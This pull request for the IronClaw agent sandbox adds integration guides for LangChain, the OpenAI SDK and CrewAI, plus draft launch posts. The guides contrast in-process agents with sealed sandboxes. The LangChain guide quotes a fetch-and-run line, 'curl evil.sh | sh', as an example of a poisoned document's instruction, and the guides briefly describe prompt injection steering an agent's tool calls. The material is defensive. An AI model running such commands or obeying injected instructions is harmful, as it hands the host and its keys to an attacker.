### PR TITLE
docs(integrations): LangChain, OpenAI SDK, CrewAI framework guides (IRO-297)

### DIFF
--- a/community/integration-guides-launch-posts.md
+++ b/community/integration-guides-launch-posts.md
@@ -1,0 +1,153 @@
+# Integration guides: launch social posts (IRO-297)
+
+Short posts to convert launch traffic to the three framework integration guides
+(LangChain, OpenAI SDK, CrewAI). Docs pages:
+
+- `docs/integrations/langchain.md`
+- `docs/integrations/openai-sdk.md`
+- `docs/integrations/crewai.md`
+
+**Status: DRAFT, launch-gated on IRO-40. Do not post before the launch gate.**
+
+Guardrails applied: no owner name, no personal GitHub / LinkedIn / Instagram
+handles; Reddit is in scope. No em-dashes or en-dashes (public-copy standing rule).
+Every claim maps to a shipped, docs-linked capability.
+
+Replace `<REPO>` with `https://github.com/IronSecCo/ironclaw` and `<DOCS>` with the
+published docs base URL at post time.
+
+---
+
+## Hacker News (Show HN style, one post covering all three)
+
+**Title:** Show HN: Run your LangChain / OpenAI-SDK / CrewAI agent behind a sealed sandbox
+
+**Body:**
+
+We kept seeing the same thing: people prototype an agent with LangChain, the OpenAI
+SDK, or CrewAI, then run it somewhere real with the API key in the process, tools
+executing with full local privileges, and wide-open egress. One prompt injection
+and that is the box.
+
+IronClaw is an AGPLv3 (plus commercial) alternative that runs the agent behind a
+sealed sandbox instead: no network card, the model key held host-side and never in
+the agent, and privileged actions (a new tool, a new agent, a new egress host)
+routed through a human-approval gateway and an audit log. The sandbox has no
+interpreter and no in-sandbox install, so you re-declare the agent (persona, model,
+tools) rather than shipping code into it. That is the security guarantee, not a
+limitation.
+
+We wrote three short guides that map each framework onto IronClaw field by field,
+plus a credential-free demo (offline mock provider, just Docker) so you can watch
+the sealed loop run before porting anything:
+
+- LangChain: <DOCS>/integrations/langchain/
+- OpenAI SDK: <DOCS>/integrations/openai-sdk/
+- CrewAI: <DOCS>/integrations/crewai/
+
+Repo: <REPO>
+
+Happy to answer questions about the isolation model.
+
+---
+
+## Reddit r/LangChain
+
+**Title:** Running a LangChain agent behind a sealed sandbox (key held host-side, tools gated)
+
+A LangChain `AgentExecutor` runs your tools in your own process, with your API key
+in memory and open outbound network. That is fine for a prototype and risky the
+moment it touches real inputs.
+
+We wrote a short guide on porting a LangChain agent to IronClaw, an open-source
+runtime that runs the same job behind a sealed sandbox: no NIC, the model key
+injected host-side (never in the agent), and privileged tool calls routed through a
+human-approval gateway. There is a field-by-field mapping (`ChatOpenAI` to a
+provider, tools to built-ins or MCP, the system prompt to a persona) and a
+credential-free mock demo so you can see it run first.
+
+Guide: <DOCS>/integrations/langchain/
+Repo (AGPLv3): <REPO>
+
+---
+
+## Reddit r/LocalLLaMA
+
+**Title:** Sandbox your OpenAI-SDK / CrewAI agents and keep the model fully local
+
+If you are running agents against a local model (Ollama, LM Studio, vLLM), IronClaw
+keeps the whole stack on your box: the sandbox has no network card, and its only
+egress is an audited proxy socket to the model you allowlist. No cloud key anywhere
+in the stack.
+
+New guides show how to port an OpenAI-SDK or CrewAI agent onto it, with the model
+key (when you do use a hosted one) held host-side and never in the agent:
+
+- OpenAI SDK: <DOCS>/integrations/openai-sdk/
+- CrewAI: <DOCS>/integrations/crewai/
+- Local model setup: <DOCS>/tutorials/local-model-ollama/
+
+Repo: <REPO>
+
+---
+
+## Reddit r/selfhosted
+
+**Title:** Self-host your agents behind a provable sandbox (LangChain / OpenAI SDK / CrewAI)
+
+IronClaw is an open-source, self-hostable runtime for AI agents that runs each agent
+in a per-session sandbox with no network card, host-side credentials, and a
+human-approval gateway for anything privileged. One command brings up a
+credential-free demo (offline mock provider, just Docker).
+
+We just published guides for bringing agents you built with LangChain, the OpenAI
+SDK, or CrewAI onto it:
+
+<DOCS>/integrations/
+Repo (AGPLv3 plus commercial): <REPO>
+
+---
+
+## X / Twitter (thread)
+
+1/ You prototyped an agent with LangChain, the OpenAI SDK, or CrewAI.
+
+Then it runs for real: API key in the process, tools with full local privileges,
+egress wide open. One prompt injection = your box.
+
+2/ IronClaw runs the same agent behind a sealed sandbox:
+
+- no network card
+- model key held host-side, never in the agent
+- new tool / new agent / new egress host all gated on human approval + audit
+
+3/ The sandbox has no interpreter and no in-sandbox install, so you re-declare the
+agent (persona, model, tools) instead of shipping code into it. That is the
+security guarantee.
+
+4/ Three short guides, field by field, plus a credential-free demo (offline mock
+provider, just Docker) so you can watch it run first:
+
+LangChain / OpenAI SDK / CrewAI -> <DOCS>/integrations/
+
+Open source (AGPLv3): <REPO>
+
+---
+
+## LinkedIn (company voice, no personal handle)
+
+Most AI agent frameworks optimize for building behavior fast. Few give you a
+security perimeter for when that agent runs against real inputs: the model key sits
+in the process, tools execute with full local privileges, and outbound network is
+open by default.
+
+IronClaw is an open-source (AGPLv3 plus commercial) runtime that closes those gaps
+by construction. Each agent runs in a sealed, per-session sandbox with no network
+card, the model credential held host-side and injected on the way out, and every
+privileged action routed through a human-approval gateway and an audit log.
+
+We published three guides for teams already building with LangChain, the OpenAI SDK,
+or CrewAI, each mapping the framework onto IronClaw field by field, with a
+credential-free demo you can run in minutes.
+
+Read them: <DOCS>/integrations/

--- a/docs/integrations/crewai.md
+++ b/docs/integrations/crewai.md
@@ -1,0 +1,121 @@
+---
+title: "From CrewAI to a sandboxed IronClaw agent"
+description: You built a multi-agent crew with CrewAI. Here is how to run those agents behind IronClaw's sealed sandbox, with model keys held host-side, agent-to-agent messaging host-mediated, and spawning a new agent gated on human approval, plus a credential-free way to see it work first.
+---
+
+# From CrewAI to a sandboxed IronClaw agent
+
+You built a crew with **CrewAI**: several agents, each with a role and tools,
+handing work to one another. Multi-agent is where the blast radius grows. Every
+agent in the crew runs in your process with your keys, every tool runs with your
+privileges, and agents talk to each other in-process with no boundary between them.
+A single poisoned task can travel the whole crew.
+
+IronClaw runs the same crew behind **sealed, per-session sandboxes**: no network
+card, model keys held **host-side**, **agent-to-agent messaging host-mediated and
+audited** (agents never talk peer-to-peer), and **spawning a new agent gated on
+mandatory human approval** because a new agent is a new trust principal.
+
+!!! info "IronClaw does not run your Python in the sandbox — and that is the point"
+    IronClaw's sandbox has **no interpreter and no in-sandbox install**. You do not
+    *wrap* the CrewAI process; you re-declare each crew member (role, model, tools)
+    as an IronClaw agent group, and IronClaw runs them inside the sealed runtime.
+    See [Skills](../skills.md) and [Security and isolation](../security-isolation.md).
+
+## Why sandbox this
+
+A typical CrewAI crew:
+
+```python
+from crewai import Agent, Crew, Task
+
+researcher = Agent(role="Researcher", tools=[search_tool], llm=llm)   # key in-process
+writer     = Agent(role="Writer",     tools=[file_tool],  llm=llm)
+crew = Crew(agents=[researcher, writer], tasks=[Task(...)])
+crew.kickoff()   # agents run in-process, hand off in-process, tools run on your box
+```
+
+The multi-agent shape multiplies the exposure:
+
+1. **Every agent holds the keys.** More agents, more places `sk-...` lives.
+2. **Tools run with your privileges.** `search_tool`, `file_tool`, and any shell or
+   HTTP tool execute on your host. Any crew member is a path in.
+3. **Hand-offs have no boundary.** Agents pass work in-process; a compromised
+   researcher can steer the writer with no gate between them.
+
+IronClaw puts a boundary at each of those seams.
+
+## See it work first (no credentials)
+
+Watch the sealed loop run with the offline `mock` provider, no key required:
+
+```sh
+git clone https://github.com/IronSecCo/ironclaw.git && cd ironclaw
+docker compose -f docker-compose.demo.yml up --build -d      # start the demo control-plane
+
+curl -s -X POST http://127.0.0.1:8787/v1/ui/chat/send \
+  -H 'authorization: Bearer ironclaw-demo' -H 'content-type: application/json' \
+  -d '{"agentGroupID":"mock-agent","text":"hello from the crew"}'
+
+sleep 3
+curl -s -H 'authorization: Bearer ironclaw-demo' \
+  http://127.0.0.1:8787/v1/ui/chat/mock-agent/messages       # the reply
+```
+
+The reply comes back through a real per-session sandbox and encrypted queues. Tear
+down with `docker compose -f docker-compose.demo.yml down`. For a two-agent shape
+close to a crew, see
+[`examples/multi-agent-team`](https://github.com/IronSecCo/ironclaw/tree/main/examples/multi-agent-team).
+
+## Port your crew
+
+Each CrewAI `Agent` becomes an IronClaw agent group:
+
+| CrewAI | IronClaw | Notes |
+|---|---|---|
+| `Agent(role=..., llm=...)` | one `ironctl agent create` per member | Each crew member is its own sandboxed agent group. |
+| `llm=ChatOpenAI(api_key=...)` | `--provider openai` + host `OPENAI_API_KEY` | Keys are host-side and injected by the model-proxy. No sandbox ever holds one. |
+| `role` / `backstory` / `goal` | `--identity` / `--soul` / `--instructions` | The agent's identity, voice, and operating rules. |
+| `tools=[...]` | `--tool <name>` (built-in) or MCP | Built-ins: `read_file`, `write_file`, `list_dir`, `web_search`, `http_fetch`. Custom tools attach over [MCP](../mcp.md). |
+| Agent-to-agent hand-off | host-mediated a2a messaging | The control-plane routes and audits every hand-off; agents never talk peer-to-peer. |
+| `Crew` spawning an agent | `create_agent` behind the approval gateway | Spawning a new agent is **never auto-approved** (threat-model boundary B3). |
+
+A researcher-plus-writer crew becomes two declared agents:
+
+```sh
+export OPENAI_API_KEY=sk-...          # host-side only; no sandbox sees it
+export IRONCLAW_API_TOKEN=$(openssl rand -hex 32)
+./bin/controlplane --dev --api-addr 127.0.0.1:8787 &
+
+ironctl agent create --name "Researcher" \
+  --provider openai --model gpt-4o \
+  --instructions "You research the topic and cite sources." \
+  --tool web_search --tool http_fetch --yes
+
+ironctl agent create --name "Writer" \
+  --provider openai --model gpt-4o \
+  --instructions "You turn research notes into a short report." \
+  --tool read_file --tool write_file --yes
+```
+
+The [`multi-agent-team`](https://github.com/IronSecCo/ironclaw/tree/main/examples/multi-agent-team)
+example wires two agents into one shared channel with priority and engage rules,
+so you can see mediated hand-off end to end.
+
+## What you gained
+
+- **Keys left every agent.** Injected host-side per request; no crew member holds a
+  secret to leak.
+- **`network=none` by default.** Each agent runs with no NIC; egress is the audited
+  model-proxy socket plus explicitly allowlisted hosts.
+- **Hand-offs and spawns are gated.** Agent-to-agent messages are host-routed and
+  audited, and `create_agent` always requires human approval. See the
+  [threat model](../threat-model.md) (boundary B3).
+
+The crew you designed in CrewAI, with a boundary at every seam it did not have.
+
+## Next
+
+- [Choose your model provider](../providers/index.md)
+- [MCP: bring your own tools](../mcp.md)
+- [multi-agent-team example](https://github.com/IronSecCo/ironclaw/tree/main/examples/multi-agent-team)

--- a/docs/integrations/langchain.md
+++ b/docs/integrations/langchain.md
@@ -1,0 +1,124 @@
+---
+title: "From LangChain to a sandboxed IronClaw agent"
+description: You prototyped an agent with LangChain. Here is how to run the same job behind IronClaw's sealed sandbox, with the model key held host-side and every tool call audited and gated, plus a credential-free way to see it work first.
+---
+
+# From LangChain to a sandboxed IronClaw agent
+
+You built an agent with **LangChain**: a prompt, a model, and a set of tools the
+model can call. That is a great way to design the *behavior*. The problem starts
+when it runs somewhere real: a LangChain `AgentExecutor` runs your tools **in your
+own process**, with your API key in memory and unrestricted outbound network. One
+prompt-injected instruction and that same process can read your environment,
+exfiltrate over the network, or call a tool you never intended.
+
+IronClaw runs the same job behind a **sealed sandbox** instead: no network card,
+the model key held **host-side** and never in the agent, and every privileged tool
+call routed through a human-approval gateway and an audit log. This page maps a
+LangChain agent onto IronClaw one field at a time.
+
+!!! info "IronClaw does not run your Python in the sandbox — and that is the point"
+    IronClaw's sandbox has **no interpreter and no in-sandbox install**: you cannot
+    drop arbitrary code into it, and neither can a prompt injection. So you do not
+    *wrap* the LangChain process; you re-declare the same agent (persona, model,
+    tools) as an IronClaw agent group, and IronClaw runs it inside the sealed
+    runtime. The behavior you designed, the security posture you did not have to
+    build. See [Skills](../skills.md) and [Security and isolation](../security-isolation.md).
+
+## Why sandbox this
+
+A typical LangChain agent:
+
+```python
+from langchain_openai import ChatOpenAI
+from langchain.agents import create_react_agent, AgentExecutor
+from langchain_community.tools import ShellTool
+
+llm = ChatOpenAI(model="gpt-4o", api_key="sk-...")   # key lives in this process
+agent = create_react_agent(llm, [ShellTool()], prompt)
+AgentExecutor(agent=agent, tools=[ShellTool()]).invoke(
+    {"input": "summarize today's incidents"}
+)
+```
+
+Three things are true of that snippet, and all three are risks:
+
+1. **The key is in the process.** Anything that can read memory or `os.environ`
+   can read `sk-...`.
+2. **Tools run with your privileges.** `ShellTool` executes on your box with your
+   filesystem and network. A poisoned document that says "run `curl evil.sh | sh`"
+   is a tool call away.
+3. **Egress is wide open.** The process can reach any host on the internet.
+
+IronClaw closes all three by construction, not by convention.
+
+## See it work first (no credentials)
+
+Before porting anything, watch the sealed loop run with the offline `mock`
+provider. No model key, no tokens, just Docker:
+
+```sh
+git clone https://github.com/IronSecCo/ironclaw.git && cd ironclaw
+docker compose -f docker-compose.demo.yml up --build -d      # start the demo control-plane
+
+curl -s -X POST http://127.0.0.1:8787/v1/ui/chat/send \
+  -H 'authorization: Bearer ironclaw-demo' -H 'content-type: application/json' \
+  -d '{"agentGroupID":"mock-agent","text":"hello from langchain-land"}'
+
+sleep 3
+curl -s -H 'authorization: Bearer ironclaw-demo' \
+  http://127.0.0.1:8787/v1/ui/chat/mock-agent/messages       # the reply
+```
+
+You get the reply echoed back, proof that a real per-session sandbox launched and
+the answer flowed home through encrypted queues. Tear down with
+`docker compose -f docker-compose.demo.yml down`. The one-command, self-checking
+version is [`examples/hello-ironclaw`](https://github.com/IronSecCo/ironclaw/tree/main/examples/hello-ironclaw).
+
+## Port your LangChain agent
+
+Map each part of the LangChain agent onto an IronClaw agent group:
+
+| LangChain | IronClaw | Notes |
+|---|---|---|
+| `ChatOpenAI(model="gpt-4o")` | `--provider openai --model gpt-4o` | Any [provider](../providers/index.md): `anthropic`, `openai`, `gemini`, `local`, and more. |
+| `api_key="sk-..."` in the client | `OPENAI_API_KEY` set **on the host** | The key is injected by the host model-proxy on the way out. It never enters the sandbox. |
+| System prompt / template | `--identity` / `--soul` / `--instructions` | The agent's persona, voice, and operating rules. |
+| Tools (`ShellTool`, retrievers, ...) | `--tool <name>` (built-in) or an MCP server | Built-ins: `read_file`, `write_file`, `list_dir`, `web_search`, `http_fetch`. Your own tools attach over [MCP](../mcp.md). |
+| `AgentExecutor.invoke(...)` | a message to the agent group | Same request/response, now through the sealed queue. |
+
+A LangChain agent that searches the web and writes a report becomes:
+
+```sh
+export OPENAI_API_KEY=sk-...          # host-side only; the sandbox never sees it
+export IRONCLAW_API_TOKEN=$(openssl rand -hex 32)
+./bin/controlplane --dev --api-addr 127.0.0.1:8787 &
+
+ironctl agent create \
+  --name "Incident Reporter" \
+  --provider openai --model gpt-4o \
+  --instructions "You summarize today's incidents and cite your sources." \
+  --tool web_search --tool http_fetch --tool write_file --yes
+```
+
+Your LangChain tools that are *not* built in attach as an [MCP server](../mcp.md):
+IronClaw registers them through the same human-approval gateway, so a new tool is a
+reviewed change, not a silent capability.
+
+## What you gained
+
+- **The key left the agent.** It lives host-side and is injected per request; a
+  compromised agent has nothing to steal.
+- **`network=none` by default.** The sandbox has no NIC. The only egress is the
+  audited model-proxy socket, plus whatever hosts you explicitly allowlist.
+- **Privileged actions are gated.** Registering a tool, spawning another agent, or
+  reaching a new host flows through a human-approval gateway and lands in the
+  [audit log](../architecture.md).
+
+Same agent you designed in LangChain. A perimeter it never had.
+
+## Next
+
+- [Choose your model provider](../providers/index.md)
+- [MCP: bring your own tools](../mcp.md)
+- [Security and isolation](../security-isolation.md)

--- a/docs/integrations/openai-sdk.md
+++ b/docs/integrations/openai-sdk.md
@@ -1,0 +1,121 @@
+---
+title: "From the OpenAI SDK to a sandboxed IronClaw agent"
+description: You built an agent with the OpenAI SDK and function calling. Here is how to run the same job behind IronClaw's sealed sandbox, with the API key held host-side and every tool call audited and gated, plus a credential-free way to see it work first.
+---
+
+# From the OpenAI SDK to a sandboxed IronClaw agent
+
+You built an agent with the **OpenAI SDK**: a `client`, a model, and a set of
+functions the model can call. The loop is familiar, and so is the exposure. The
+SDK client holds your API key in the process, your tool functions run with your
+full local privileges, and nothing stops the process from reaching any host on the
+internet. One tool-call the model was talked into making, and that is your box.
+
+IronClaw runs the same job behind a **sealed sandbox**: no network card, the API
+key held **host-side** and never in the agent, and every privileged tool call
+routed through a human-approval gateway and an audit log. IronClaw already speaks
+the OpenAI wire format, so this is a short trip.
+
+!!! info "IronClaw does not run your Python in the sandbox — and that is the point"
+    IronClaw's sandbox has **no interpreter and no in-sandbox install**. You do not
+    *wrap* the OpenAI SDK process; you re-declare the same agent (persona, model,
+    tools) as an IronClaw agent group, and IronClaw runs it inside the sealed
+    runtime. A prompt injection cannot introduce code where there is no interpreter
+    to run it. See [Skills](../skills.md) and [Security and isolation](../security-isolation.md).
+
+## Why sandbox this
+
+A typical OpenAI-SDK tool loop:
+
+```python
+from openai import OpenAI
+
+client = OpenAI(api_key="sk-...")          # key lives in this process
+
+def run_shell(cmd: str) -> str:            # runs on YOUR box, YOUR privileges
+    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout
+
+resp = client.chat.completions.create(
+    model="gpt-4o",
+    messages=[{"role": "user", "content": "clean up the temp files"}],
+    tools=[{"type": "function", "function": {"name": "run_shell", ...}}],
+)
+# your code then executes whatever run_shell the model asked for
+```
+
+The risks are structural, not stylistic:
+
+1. **The key is in the process.** `sk-...` is one memory read away.
+2. **Tool functions run with your privileges.** `run_shell` is your shell. The
+   model decides the argument; a poisoned input decides the model.
+3. **Egress is wide open.** The process can call anywhere.
+
+IronClaw removes all three by construction.
+
+## See it work first (no credentials)
+
+Watch the sealed loop run with the offline `mock` provider, no key required:
+
+```sh
+git clone https://github.com/IronSecCo/ironclaw.git && cd ironclaw
+docker compose -f docker-compose.demo.yml up --build -d      # start the demo control-plane
+
+curl -s -X POST http://127.0.0.1:8787/v1/ui/chat/send \
+  -H 'authorization: Bearer ironclaw-demo' -H 'content-type: application/json' \
+  -d '{"agentGroupID":"mock-agent","text":"hello from the openai sdk"}'
+
+sleep 3
+curl -s -H 'authorization: Bearer ironclaw-demo' \
+  http://127.0.0.1:8787/v1/ui/chat/mock-agent/messages       # the reply
+```
+
+The reply comes back through a real per-session sandbox and encrypted queues. Tear
+down with `docker compose -f docker-compose.demo.yml down`. The self-checking
+version is [`examples/hello-ironclaw`](https://github.com/IronSecCo/ironclaw/tree/main/examples/hello-ironclaw).
+
+## Port your OpenAI-SDK agent
+
+| OpenAI SDK | IronClaw | Notes |
+|---|---|---|
+| `OpenAI(api_key="sk-...")` | `--provider openai` + host `OPENAI_API_KEY` | The key is injected host-side by the model-proxy. It never enters the sandbox. |
+| `model="gpt-4o"` | `--model gpt-4o` | Or switch backend entirely: `anthropic`, `gemini`, `local`. See [providers](../providers/index.md). |
+| System message | `--identity` / `--soul` / `--instructions` | Who the agent is and how it operates. |
+| `tools=[{function ...}]` | `--tool <name>` (built-in) or an MCP server | Built-ins: `read_file`, `write_file`, `list_dir`, `web_search`, `http_fetch`. Your own functions attach over [MCP](../mcp.md). |
+| `chat.completions.create(...)` | a message to the agent group | Same round-trip, now through the sealed queue. |
+
+The tool loop above becomes a declared agent, no key in the code:
+
+```sh
+export OPENAI_API_KEY=sk-...          # host-side only; the sandbox never sees it
+export IRONCLAW_API_TOKEN=$(openssl rand -hex 32)
+./bin/controlplane --dev --api-addr 127.0.0.1:8787 &
+
+ironctl agent create \
+  --name "Housekeeper" \
+  --provider openai --model gpt-4o \
+  --instructions "You tidy the workspace and report what you changed." \
+  --tool list_dir --tool read_file --tool write_file --yes
+```
+
+Note what is missing: there is no `run_shell` that is your shell. IronClaw's
+built-in tools act only inside the agent's own private workspace, and anything more
+powerful is an [MCP tool](../mcp.md) you register through the approval gateway, once,
+in the open.
+
+## What you gained
+
+- **The key left the agent.** Injected host-side per request; a compromised agent
+  has nothing to exfiltrate.
+- **`network=none` by default.** No NIC in the sandbox; egress is the audited
+  model-proxy socket plus any host you explicitly allowlist.
+- **Privileged actions are gated.** New tool, new agent, new egress host: each is a
+  reviewed [change request](../mcp.md), not a silent capability, and each lands in
+  the [audit log](../architecture.md).
+
+Same agent you built with the OpenAI SDK. A perimeter it never had.
+
+## Next
+
+- [Choose your model provider](../providers/index.md)
+- [MCP: bring your own tools](../mcp.md)
+- [Security and isolation](../security-isolation.md)

--- a/mkdocs.yml
+++ b/mkdocs.yml
@@ -132,6 +132,9 @@ nav:
   - Skills: skills.md
   - Integrations:
       - CI (GitHub Action): integrations/ci.md
+      - LangChain: integrations/langchain.md
+      - OpenAI SDK: integrations/openai-sdk.md
+      - CrewAI: integrations/crewai.md
   - Social proof: social-proof.md
   - Security & Trust:
       - Overview: security.md


### PR DESCRIPTION
## What

Three copy-pasteable integration guides that convert launch traffic from framework users into IronClaw users, plus launch-gated social copy.

- `docs/integrations/langchain.md`
- `docs/integrations/openai-sdk.md`
- `docs/integrations/crewai.md`
- `community/integration-guides-launch-posts.md` (launch-gated on IRO-40, not in nav)
- `mkdocs.yml` nav entries under **Integrations**

Each guide: a 1-screen credential-free demo, a field-by-field port table (framework concept → IronClaw agent group), and a why-sandbox-this hook grounded in the threat model.

## Framing decision (please sanity-check)

The issue asked to show IronClaw "wrapping/sandboxing agents built with" each framework. I verified against the codebase that IronClaw's sandbox is a **sealed runtime with no interpreter and no in-sandbox install** (`docs/skills.md`, `internal/host/isolation/oci.go`) and the model proxy is a unix-socket egress broker, not a standalone gateway. So the literal reading (execute your LangChain/CrewAI Python inside the sandbox, or point an external app's `base_url` at IronClaw) is **not a shipped path, and publishing it as if it were would be vaporware that undercuts our sealed-runtime pillar.**

So the guides use the honest, on-brand framing: **you built the agent with framework X; here is the sandboxed IronClaw equivalent, and why the framework's default posture is a risk.** The sealed runtime is presented as the security guarantee, not a limitation. Every mapping (`--provider`, `--identity/--soul/--instructions`, `--tool`, MCP) was read directly from `cmd/ironctl/agent.go` and `internal/host/catalog/catalog.go`.

## Verification

- `mkdocs build --strict` passes (links + nav resolve).
- The credential-free command block is lifted **verbatim** from the CI-verified `docs/quickstart.md` / `examples/hello-ironclaw` path, which `.github/workflows/example-smoke.yml` runs on every push.
- All `ironctl` flags and built-in tool names verified against source.
- Attempted a live local `docker compose` round-trip twice; both blocked by a transient Docker Desktop buildkit failure in this environment (containerd tmpmount cache, then worker-list EOF) unrelated to IronClaw. The path itself is continuously verified in CI.

## Guardrails

- Public copy: no owner name, no personal GitHub/LinkedIn/Instagram; Reddit in scope.
- No em-dashes or en-dashes (standing rule); scanned clean.
- Social posts are DRAFT, gated on IRO-40.

Closes IRO-297 (pending review).